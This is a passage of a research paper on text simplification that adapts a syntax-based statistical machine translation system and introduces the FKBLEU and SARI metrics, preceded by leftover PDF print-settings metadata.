<FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ehgjstdkgncm7pg3typfq6cpcu ---- Optimizing Statistical Machine Translation for Text Simplification Wei Xu1, Courtney Napoles2, Ellie Pavlick1, Quanze Chen1 and Chris Callison-Burch1 1 Computer and Information Science Department University of Pennsylvania {xwe, epavlick, cquanze, ccb}@seas.upenn.edu 2 Department of Computer Science Johns Hopkins University courtneyn@jhu.edu Abstract Most recent sentence simplification systems use basic machine translation models to learn lexical and syntactic paraphrases from a man- ually simplified parallel corpus. These meth- ods are limited by the quality and quantity of manually simplified corpora, which are expen- sive to build. In this paper, we conduct an in- depth adaptation of statistical machine trans- lation to perform text simplification, taking advantage of large-scale paraphrases learned from bilingual texts and a small amount of manual simplifications with multiple refer- ences. Our work is the first to design auto- matic metrics that are effective for tuning and evaluating simplification systems, which will facilitate iterative development for this task. 1 Introduction The goal of text simplification is to rewrite an input text so that the output is more readable. Text sim- plification has applications for reducing input com- plexity for natural language processing (Siddharthan et al., 2004; Miwa et al., 2010; Chen et al., 2012b) and providing reading aids for people with lim- ited language skills (Petersen and Ostendorf, 2007; Watanabe et al., 2009; Allen, 2009; De Belder and Moens, 2010; Siddharthan and Katsos, 2010) or lan- guage impairments such as dyslexia (Rello et al., 2013), autism (Evans et al., 2014), and aphasia (Car- roll et al., 1999). It is widely accepted that sentence simplification can be implemented by three major types of oper- ations: splitting, deletion and paraphrasing (Feng, 2008). The splitting operation decomposes a long sentence into a sequence of shorter sentences. Dele- tion removes less important parts of a sentence. The paraphrasing operation includes reordering, lexical substitutions and syntactic transformations. While sentence splitting (Siddharthan, 2006; Petersen and Ostendorf, 2007; Narayan and Gardent, 2014; An- grosh et al., 2014) and deletion (Knight and Marcu 2002; Clarke and Lapata 2006; Filippova and Strube 2008; Filippova et al. 2015; Rush et al. 2015; and others) have been intensively studied, there has been considerably less research on developing new para- phrasing models for text simplification — most pre- vious work has used off-the-shelf statistical machine translation (SMT) technology and achieved reason- able results (Coster and Kauchak, 2011a,b; Wubben et al., 2012; Štajner et al., 2015). However, they have either treated the judgment technology as a black (Coster and Kauchak, 2011a,b; Narayan and Gar- dent, 2014; Angrosh et al., 2014; Štajner et al., 2015) or they have been limited to modifying only one as- pect of it, such as the translation model (Zhu et al., 2010; Woodsend and Lapata, 2011) or the reranking component (Wubben et al., 2012). In this paper, we present a complete adaptation of a syntax-based machine translation framework to perform simplification. Our methodology poses text simplification as a paraphrasing problem: given an input text, rewrite it subject to the constraints that the output should be simpler than the input, while preserving as much meaning of the input as pos- sible, and maintaining the well-formedness of the text. Going beyond previous work, we make di- 401 Transactions of the Association for Computational Linguistics, vol. 4, pp. 401–415, 2016. Action Editor: Stefan Riezler. Submission batch: 10/2015; Revision batch: 2/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. rect modifications to four key components in the SMT pipeline:1 1) two novel simplification-specific tunable metrics; 2) large-scale paraphrase rules au- tomatically derived from bilingual parallel corpora, which are more naturally and abundantly available than manually simplified texts; 3) rich rule-level simplification features; and 4) multiple reference simplifications collected via crowdsourcing for tun- ing and evaluation. In particular, we report the first study that shows promising correlations of au- tomatic metrics with human evaluation. Our work answers the call made in a recent TACL paper (Xu et al., 2015) to address problems in current simplifi- cation research — we amend human evaluation cri- teria, develop automatic metrics, and generate an improved multiple reference dataset. Our work is primarily focused on lexical simplifi- cation (rewriting words or phrases with simpler ver- sions), and to a lesser extent on syntactic rewrite rules that simplify the input. It largely ignores the important subtasks of sentence splitting and dele- tion. Our focus on lexical simplification does not af- fect the generality of the presented work, since dele- tion or sentence splitting could be applied as pre- or post-processing steps. 2 Background Xu et al. (2015) laid out a series of problems that are present in current text simplification research, and argued that we should deviate from the previous state-of-the-art benchmarking setup. First, the Simple English Wikipedia data has dom- inated simplification research since 2010 (Zhu et al., 2010; Siddharthan, 2014), and is used together with Standard English Wikipedia to create parallel text to train MT-based simplification systems. How- ever, recent studies (Xu et al., 2015; Amancio and Specia, 2014; Hwang et al., 2015; Štajner et al., 2015) showed that the parallel Wikipedia simplifi- cation corpus contains a large proportion of inade- quate (not much simpler) or inaccurate (not aligned or only partially aligned) simplifications. It is one of the leading reasons that existing simplification sys- tems struggle to generate simplifying paraphrases and leave the input sentences unchanged (Wubben 1Our code and data are made available at: https:// github.com/cocoxu/simplification/ et al., 2012). Previously researchers attempted some quick fixes by adding phrasal deletion rules (Coster and Kauchak, 2011a) or reranking n-best outputs based on their dissimilarity to the input (Wubben et al., 2012). In contrast, we exploit data with im- proved quality and enlarged quantity, namely, large- scale paraphrase rules automatically derived from bilingual corpora and a small amount of manual simplification data with multiple references for tun- ing parameters. We then systematically design new tuning metrics and rich simplification-specific fea- tures into a syntactic machine translation model to enforce optimization towards simplicity. This ap- proach achieves better simplification performance without relying on a manually simplified corpus to learn paraphrase rules, which is important given the fact that Simple Wikipedia and the newly released Newsela simplification corpus (Xu et al., 2015) are only available for English. Second, previous evaluation used in the simplifi- cation literature is uninformative and not compara- ble across models due to the complications between the three different operations of paraphrasing, dele- tion, and splitting. This, combined with the unreli- able quality of Simple Wikipedia as a gold reference for evaluation, has been the bottleneck for develop- ing automatic metrics. There exist only a few stud- ies (Wubben et al., 2012; Štajner et al., 2014) on au- tomatic simplification evaluation using existing MT metrics which show limited correlation with human assessments. In this paper, we restrict ourselves to lexical simplification, where we believe MT-derived evaluation metrics can best be deployed. Our newly proposed metric is the first automatic metric that shows reasonable correlation with human evalua- tion on the text simplification task. We also intro- duce multiple references to make automatic evalua- tion feasible. The most related work to ours is that of Gan- itkevitch et al. (2013) on sentence compression, in which compression of word and sentence lengths can be more straightforwardly implemented in fea- tures and the objective function in the SMT frame- work. We want to stress that sentence simplifica- tion is not a simple extension of sentence compres- sion, but is a much more complicated task, primarily because high-quality data is much harder to obtain and the solution space is more constrained by word 402 choice and grammar. Our work is also related to other tunable metrics designed to be very simple and light-weight to ensure fast repeated computation for tuning bilingual translation models (Liu et al., 2010; Chen et al., 2012a). To the best of our knowledge, no tunable metric has been attempted for simplifica- tion, except for BLEU. Nor do any evaluation met- rics exist for simplification, although there are sev- eral designed for other text-to-text generation tasks: grammatical error correction (Napoles et al., 2015; Felice and Briscoe, 2015; Dahlmeier and Ng, 2012), paraphrase generation (Chen and Dolan, 2011; Xu et al., 2012; Sun and Zhou, 2012), and conversation generation (Galley et al., 2015). Another line of re- lated work is lexical simplification that focuses on finding simpler synonyms of a given complex word (Yatskar et al., 2010; Biran et al., 2011; Specia et al., 2012; Horn et al., 2014). 3 Adapting Machine Translation for Simplification We adapt the machinery of statistical machine trans- lation to the task of text simplification by making changes in the following four key components: 3.1 Simplification-specific Objective Functions In the statistical machine translation framework, one crucial element is to design automatic evaluation metrics to be used as training objectives. Train- ing algorithms, such as MERT (Och, 2003) or PRO (Hopkins and May, 2011), then directly optimize the model parameters such that the end-to-end simplifi- cation quality is optimal. Unfortunately, previous work on text simplification has only used BLEU for tuning, which is insufficient as we show empirically in Section 4. We propose two new light-weight met- rics instead: FKBLEU that explicitly measures read- ability and SARI that implicitly measures it by com- paring against the input and references. Unlike machine translation metrics which do not compare against the (foreign) input sentence, it is necessary to compare simplification system outputs against the inputs to assess readability changes. It is also important to keep tunable metrics as simple as possible, since they are repeatedly computed dur- ing the tuning process for hundreds of thousands of candidate outputs. FKBLEU Our first metric combines a previously proposed metric for paraphrase generation, iBLEU (Sun and Zhou, 2012), and the widely used readability metric, Flesch-Kincaid Index (Kincaid et al., 1975). iBLEU is an extension of the BLEU metric to measure di- versity as well as adequacy of the generated para- phrase output. Given a candidate sentence O, human references R and input text I, iBLEU is defined as: iBLEU = α× BLEU(O,R) (1) −(1−α)× BLEU(O,I). where α is a parameter taking balance between ade- quacy and dissimilarity, and set to 0.9 empirically as suggested by Sun and Zhou (2012). Since the text simplification task aims at improv- ing readability, we include the Flesch-Kincaid Index (FK) which estimates the readability of text using cognitively motivated features (Kincaid et al., 1975): FK = 0.39× ( #words #sentences ) (2) +11.8× ( #syllables #words ) −15.59 with a lower value indicating higher readability.2 We adapt FK to score individual sentences and change it so that it counts punctuation tokens as well as word, and counts each punctuation token as one syllable. This prevents it from arbitrarily deleting punctua- tion. FK measures readability assuming that the text is well-formed, and therefore is insufficient alone as a metric for generating or evaluating automatically generated sentences. Combining FK and iBLEU captures both a measure of readability and adequacy. The resulting objective function, FKBLEU, is de- fined as a geometric mean of the iBLEU and the FK difference between input and output sentences: FKBLEU = iBLEU(I,R,O)× FKdiff(I,O) FKdiff = sigmoid(FK(O)− FK(I)) (3) Sentences with higher FKBLEU values are better simplifications with higher readability. 2The FK coefficients were derived via multiple regression applied to the reading compression test scores of 531 Navy per- sonnel reading training manuals. These values are typically used unmodified, as we do here. 403 SARI We design a second new metric SARI that prin- cipally compares system output against references and against the input sentence. It explicitly mea- sures the goodness of words that are added, deleted and kept by the systems (Figure 1). We reward addition operations, where system out- put O was not in the input I but occurred in any of the references R, i.e. O ∩ I ∩R. We define n-gram precision p(n) and recall r(n) for addition opera- tions as follows:3 padd(n) = ∑ g∈O min ( #g(O ∩ I), #g(R) ) ∑ g∈O #g(O ∩ I) radd(n) = ∑ g∈O min ( #g(O ∩ I), #g(R) ) ∑ g∈O #g(R ∩ I) (4) where #g(·) is a binary indicator of occurrence of n- grams g in a given set (and is a fractional indicator in some later formulas) and #g(O ∩ I) = max(#g(O)−#g(I), 0) #g(R ∩ I) = max(#g(R)−#g(I), 0) Therefore, in the example below, the addition of un- igram now is rewarded in both padd(n) and radd(n), while the addition of you in OUTPUT-1 is penalized in padd(n): INPUT: About 95 species are currently accepted . REF-1: About 95 species are currently known . REF-2: About 95 species are now accepted . REF-3: 95 species are now accepted . OUTPUT-1: About 95 you now get in . OUTPUT-2: About 95 species are now agreed . OUTPUT-3: About 95 species are currently agreed. The corresponding SARI scores of these three toy outputs are 0.2683, 0.7594, 0.5890, which match with intuitions about their quality. To put it in perspective, the BLEU scores are 0.1562, 0.6435, 0.6435 respectively. BLEU fails to distinguish be- tween OUTPUT-2 and OUTPUT-3 because match- ing any one of references is credited the same. Not all the references are necessarily complete simpli- fications, e.g. REF-1 doesn’t simplify the word 3In the rare case when the denominator is 0 in calculating precision p or recall r, we simply set the value of p and r to 0. Input System outputHuman references Input that is unchanged by system and which is not in the reference Input that is retained in the references, but was deleted by the system Overlap between all 3 Input that was correctly deleted by the system, and replaced by content from the references Potentially incorrect system output Figure 1: Metrics that evaluate the output of monolingual text-to-text generation systems can compare system out- put against references and against the input sentence, un- like in MT metrics which do not compare against the (for- eign) input sentence. The different regions of this Venn diagram are treated differently with our SARI metric. currently, which gives BLEU too much latitude for matching the input. Words that are retained in both the system out- put and references should be rewarded. When mul- tiple references are used, the number of references in which an n-gram was retained matters. It takes into account that some words/phrases are considered simple and are unnecessary (but still encouraged) to be simplified. We use R′ to mark the n-gram counts over R with fractions, e.g. if a unigram (word about in above example) occurs in 2 out of the total r ref- erences, then its count is weighted by 2/r in compu- tation of precision and recall: pkeep(n) = ∑ g∈I min ( #g(I ∩O), #g(I ∩R′) ) ∑ g∈I #g(I ∩O) rkeep(n) = ∑ g∈I min ( #g(I ∩O), #g(I ∩R′) ) ∑ g∈I #g(I ∩R′) (5) where #g(I ∩O) = min ( #g(I), #g(O) ) #g(I ∩R′) = min ( #g(I), #g(R)/r ) For deletion, we only use precision because over- deleting hurts readability much more significantly than not deleting: pdel(n) = ∑ g∈I min ( #g(I∩O),#g(I∩R′) ) ∑ g∈I #g(I∩O) (6) where #g(I ∩O) = max ( #g(I)−#g(O), 0 ) #g(I ∩R′) = max ( #g(I)−#g(R)/r, 0 ) 404 [RB] solely → only Lexical [NN] objective → goal [JJ] undue → unnecessary [VP] accomplished → carried out Phrasal [VP/PP] make a significant contribution → contribute greatly [VP/S] is generally acknowledged that → is widely accepted that [NP/VP] the manner in which NN → the way NN Syntactic [NP] NNP ’s population → the people of NNP [NP] NNP ’s JJ legislation → the JJ law of NNP Table 1: Example paraphrase rules in the Paraphrase Database (PPDB) that result in simplifications of the input. The rules are synchronous context-free grammar (SCFG) rules where uppercase indicates non-terminal symbols. Non- terminals can be complex symbols like VP/S which indicates that the rule forms a verb phrase (VP) missing a sentence (S) to its right. The final syntactic rule both simplifies and reorders the input phrase. The precision of what is kept also reflects the suf- ficiency of deletions. The n-gram counts are also weighted in R′ to compensate n-grams, such as the word currently in the example, that are not consid- ered as required simplification by human editors. Together, in SARI, we use arithmetic average of n-gram precisions Poperation and recalls Roperation: SARI = d1Fadd + d2Fkeep + d3Pdel (7) where d1 = d2 = d3 = 1/3 and Poperation = 1 k ∑ n=[1,...,k] poperation(n) Roperation = 1 k ∑ n=[1,...,k] roperation(n) Foperation = 2×Poperation ×Roperation Poperation + Roperation operation ∈ [del,keep,add] where k is the highest n-gram order and set to 4 in our experiments. 3.2 Incorporating Large-Scale Paraphrase Rules Another challenge for text simplification is generat- ing an ample set of rewrite rules that potentially sim- plify an input sentence. Most early work has relied on either hand-crafted rules (Chandrasekar et al., 1996; Carroll et al., 1999; Siddharthan, 2006; Vick- rey and Koller, 2008) or dictionaries like WordNet (Devlin et al., 1999; Kaji et al., 2002; Inui et al., 2003). Other more recent studies have relied on the parallel Normal-Simple Wikipedia Corpus to au- tomatically extract rewrite rules (Zhu et al., 2010; Woodsend and Lapata, 2011; Coster and Kauchak, 2011b; Wubben et al., 2012; Narayan and Gar- dent, 2014; Siddharthan and Angrosh, 2014; An- grosh et al., 2014). This technique does manage to learn a small number of transformations that sim- plify. However, we argue that because the size of the Normal-Simple Wikipedia parallel corpus is quite small (108k sentence pairs with 2 million words), the diversity and coverage of patterns that can be learned is actually quite limited. In this paper we will leverage the large-scale Para- phrase Database (PPDB)4 (Ganitkevitch et al., 2013; Pavlick et al., 2015) as a rich source of lexical, phrasal and syntactic simplification operations. It is created by extracting English paraphrases from bilingual parallel corpora using a technique called “bilingual pivoting” (Bannard and Callison-Burch, 2005). The PPDB is represented as a synchronous context-free grammar (SCFG), which is commonly used as the formalism for syntax-based machine translation (Zollmann and Venugopal, 2006; Chiang, 2007; Weese et al., 2011). Table 1 shows some ex- ample paraphrase rules in the PPDB. PPDB employs 1000 times more data (106 mil- lion sentence pairs with 2 billion words) than the Normal-Simple Wikipedia parallel corpus. The En- glish portion of PPDB contains over 220 million paraphrase rules, consisting of 8 million lexical, 73 million phrasal and 140 million syntactic para- 4http://paraphrase.org 405 phrase patterns. The key differences between the paraphrase rules from PPDB and the transforma- tions learned by the naive application of SMT to the Normal-Simple Wikipedia parallel corpus, are that the PPDB paraphrases are much more diverse. For example, PPDB contains 214 paraphrases for ancient including antique, ancestral, old, age-old, archeological, former, antiquated, longstanding, ar- chaic, centuries-old, and so on. However, there is nothing inherent in the rule extraction process to say which of the PPDB paraphrases are simplifications. In this paper, we model the task by incorporating rich features into each rule and let SMT advances in decoding and optimization determine how well a rule simplifies an input phrase. An alternative way of using PPDB for simplification would be to sim- ply discard any of its rules which did not result in a simplified output, possibly using a simple super- vised classifier (Pavlick and Callison-Burch, 2016). 3.3 Simplification-specific Features for Paraphrase Rules Designing good features is an essential aspect of modeling. For each input sentence i and its candi- date output sentence j, a vector of feature functions ~ϕ = {ϕ1...ϕN} are combined with a weight vector ~w in a linear model to obtain a single score h~w: h~w(i,j) = ~w · ~ϕ(i,j) (8) In SMT, typical feature functions are phrase trans- lation probabilities, word-for-word lexical transla- tion probabilities, a rule application penalty (which governs whether the system prefers fewer longer phrases or a greater number of shorter phrases), and a language model probability. Together these fea- tures are what the model uses to distinguish between good and bad translations. For monolingual transla- tion tasks, previous research suggests that features like paraphrase probability and distributional sim- ilarity are potentially helpful in picking out good paraphrases (Chan et al., 2011) and for text-to-text generation (Ganitkevitch et al., 2012b). While these two features quantify how good a paraphrase rule is in general, they do not indicate how good the rule is for a specific task, like simplification. For each paraphrase rule, we use all the 33 fea- tures that were distributed with PPDB 1.0 and add 9 new features for simplification purposes:5 length in characters, length in words, number of syllables, language model scores, and fraction of common En- glish words in each rule. These features are com- puted for both sides of a paraphrase pattern, the word with the maximum number of syllables on each side and the difference between the two sides, when it is applicable. We use language models built from the Gigaword corpus and the Simple Wikipedia corpus collected by Kauchak (2013). We also use a list of 3000 most common US English words compiled by Paul and Bernice Noll.6 3.4 Creating Multiple References Like with machine translation, where there are many equally good translations, in simplification there may be several ways of simplifying a sentence. Most previous work on text simplification only uses a sin- gle reference simplification, often from the Simple Wikipedia. This is undesirable since the Simple Wikipedia contains a large proportion of inadequate or inaccurate simplifications (Xu et al., 2015) . In this study, we collect multiple human reference simplifications that focus on simplification by para- phrasing rather than deletion or splitting. We first selected the Simple-Normal sentence pairs of simi- lar length (≤ 20% differences in number of tokens) from the Parallel Wikipedia Simplification (PWKP) corpus (Zhu et al., 2010) that are more likely to be paraphrase-only simplifications. We then asked 8 workers on Amazon Mechanical Turk to rewrite a selected sentence from Normal Wikipedia (a subset of PWKP) into a simpler version while preserving its meaning, without losing any information or split- ting sentence. We removed bad workers by man- ual inspection on the worker’s first several submis- sions on the basis of a recent study (Gao et al., 2015) on crowdsourcing translation that suggests Turkers’ performance stays consistent over time and can be reliably predicted by their first few translations. In total, we collected 8 reference simplifications for 2350 sentences, and randomly split them into 2000 sentences for tuning, 350 for evaluation. Many crowdsourcing workers were able to provide simpli- fications of good quality and diversity (see Table 2 5We release the data with details for each feature. 6http://www.manythings.org/vocabulary/ lists/l/noll-about.php 406 for an example and Table 4 for the manual quality evaluation). Having multiple references allows us to develop automatic metrics similar to BLEU to take advantage of the variation across many people’s sim- plifications. We leave more in-depth investigations on crowdsourcing simplification (Pellow and Eske- nazi, 2014a,b) for future work. 3.5 Tuning Parameters Like in statistical machine translation, we set the weights of the linear model ~w in the Equation (8) so that the system’s output is optimized with re- spect to the automatic evaluation metric on the 2000 sentence development set. We use the pairwise ranking optimization (PRO) algorithm (Hopkins and May, 2011) implemented in the open-source Joshua toolkit (Ganitkevitch et al., 2012a; Post et al., 2013) for tuning. Specifically, we train the system to distinguish a good candidate output j from a bad candidate j′, measured by an objective function o (Section 3.1), for an input sentence i: o(i,j) >o(i,j′) ⇐⇒ h~w(i,j) > h~w(i,j′) ⇐⇒ h~w(i,j)−h~w(i,j′) > 0 ⇐⇒ ~w · ~ϕ(i,j)− ~w · ~ϕ(i,j′) > 0 ⇐⇒ ~w · (~ϕ(i,j)− ~ϕ(i,j′)) > 0 (9) Thus, the optimization reduces to a binary classifi- cation problem. Each training instance is the dif- ference vector ~ϕ(i,j) − ~ϕ(i,j′)) of a pair of can- didates, and its training label is positive or negative depending on whether the value of o(i,j) −o(i,j′) is positive or negative. The candidates are generated according to h~w at each iteration, and sampled for making the training tractable. We use different met- rics: BLEU, FKBLEU and SARI as objectives. 4 Experiments and Analyses We implemented all the proposed adaptations into the open source syntactic machine translation de- coder Joshua (Post et al., 2013),7 and conducted the experiments with PPDB and the dataset of 2350 sentences collected in Section 3.4. Most recent 7http://joshua-decoder.org/ We augment its lat- est version to include the text-to-text generation functionality described in this paper. Paraphrase Rule Trans. Model Score principal → key 4.515 principal → main 4.514 principal → major 4.358 principal → chief 3.205 principal → core 3.025 principal → principal 2.885 principal → top 2.600 principal → senior 2.480 principal → lead 2.377 principal → primary 2.171 principal → prime 1.432 principal → keynote -0.795 able-bodied → valid 6.435 able-bodied → sound 5.838 able-bodied → healthy 4.446 able-bodied → able-bodied 3.372 able-bodied → job-ready 1.611 able-bodied → employable -0.363 able-bodied → non-disabled -2.207 Table 3: Qualitative analysis of candidate paraphrases ranked by the translation model in SBMT (PPDB + SARI), showing that the model is optimized towards sim- plicity in addition to the correctness of paraphrases. The final simplifications (in bold) are chosen in conjunction with the language model to fit the context and further bias towards more common n-grams. end-to-end sentence simplification systems use a basic phrase-based MT model trained on parallel Wikipedia data using the Moses decoder (Štajner et al., 2015, and others). One of the best systems is PBMT-R by Wubben et al. (2012), which reranks Moses’ n-best outputs based on their dissimilarity to the input to promote simplification. We also build a baseline by using BLEU as the tuning metric in our adapted MT framework. We conduct both human and automatic evaluation to demonstrate the advan- tage of the proposed simplification systems. We also show the effectiveness of the two new metrics in tun- ing and automatic evaluation. 4.1 Qualitative Analysis Table 2 shows a representative example of the sim- plification results. The PBMT-R model failed to learn any good substitutions for the word able- bodied or the phrase are required to from the man- ually simplified corpora of limited size. In contrast, our proposed method can make use of more para- 407 Sentence Normal Wikipedia Jeddah is the principal gateway to Mecca, Islam’s holiest city, which able-bodied Muslims are required to visit at least once in their lifetime. Simple Wikipedia Jeddah is the main gateway to Mecca, the holiest city of Islam, where able-bodied Muslims must go to at least once in a lifetime. Mechanical Turk #1 Jeddah is the main entrance to Mecca, the holiest city in Islam, which all healthy Muslims need to visit at least once in their life. Mechanical Turk #2 Jeddah is the main entrance to Mecca, Islam’s holiest city, which pure Muslims are re- quired to visit at least once in their lifetime. PBMT-R (Wubben et al., 2012) Jeddah is the main gateway to Mecca, Islam’s holiest city, which able-bodied Muslims are required of Muslims at least once in their lifetime. SBMT (PPDB + BLEU) Jeddah is the main door to Mecca, Islam’s holiest city, which sound Muslims are to go to at least once in their life. SBMT (PPDB + FKBLEU) Jeddah is the main gateway to Mecca, Islam’s holiest city, which sound Muslims must visit at least once in their life. SBMT (PPDB + SARI) Jeddah is the main gateway to Mecca, Islam’s holiest city, which sound Muslims have to visit at least once in their life. Table 2: Example human reference simplifications and automatic simplification system outputs. The bold font high- lights the parts of the sentence that are different from the original version in the Normal Wikipedia, and strikethrough denotes deletions. phrases learned from the more abundant bilingual texts. It improves method applicability to languages other than English, for which no simpler version of Wikipedia is available. Our proposed approach also provides an intu- itive way to inspect the ranking of candidate para- phrases in the translation model. This is done by scoring each rule in PPDB by Equation 8 using the weights optimized in the tuning process, as in Ta- ble 3. It shows that our proposed method is capable of capturing the notion of simplicity using a small amount of parallel tuning data. It correctly ranks key and main as good simplifications for principal. Its choices are not always perfect as it prefers sound over healthy for able-bodied. The final simplifi- cation outputs are generated according to both the translation model and the language model trained on the Gigaword corpus to take into account context and further bias towards more common n-grams. 4.2 Quantitative Evaluation of Simplification Systems For the human evaluation, participants were shown the original English Wikipedia sentence as a ref- erence and asked to judge a set of simplifications that were displayed in random order. They eval- uated a simplification from each system, the Sim- ple Wikipedia version, and a Turker simplification. Judges rated each simplification on two 5-point scales of meaning retention and grammaticality (0 is the worst and 4 is the best). We also ask partici- pants to rate Simplicity Gain (Simplicity+) by count- ing how many successful lexical or syntactic para- phrases occurred in the simplification. We found this makes the judgment easier and that it is more infor- mative than rating the simplicity directly on 5-point scale, since the original sentences have very differ- ent readability levels to start with. More importantly, using simplicity gain avoids over-punishment of er- rors, which are already penalized for poor meaning retention and grammaticality, and thus reduces the bias towards very conservative models. We collect judgments on these three criteria from five different annotators and report the average scores. Table 4 shows that our best system, a syntactic- based MT system (SBMT) using PPDB as the source of paraphrase rules and tuning towards the SARI metric, achieves better performance in all three simplification measurements than the state-of- the-art system PBMT-R. The relatively small val- ues of simplicity gain, even for the two human ref- erences (Simple Wikipedia and Mechanical Turk), clearly show the major challenge of simplification, which is the need of not only generating 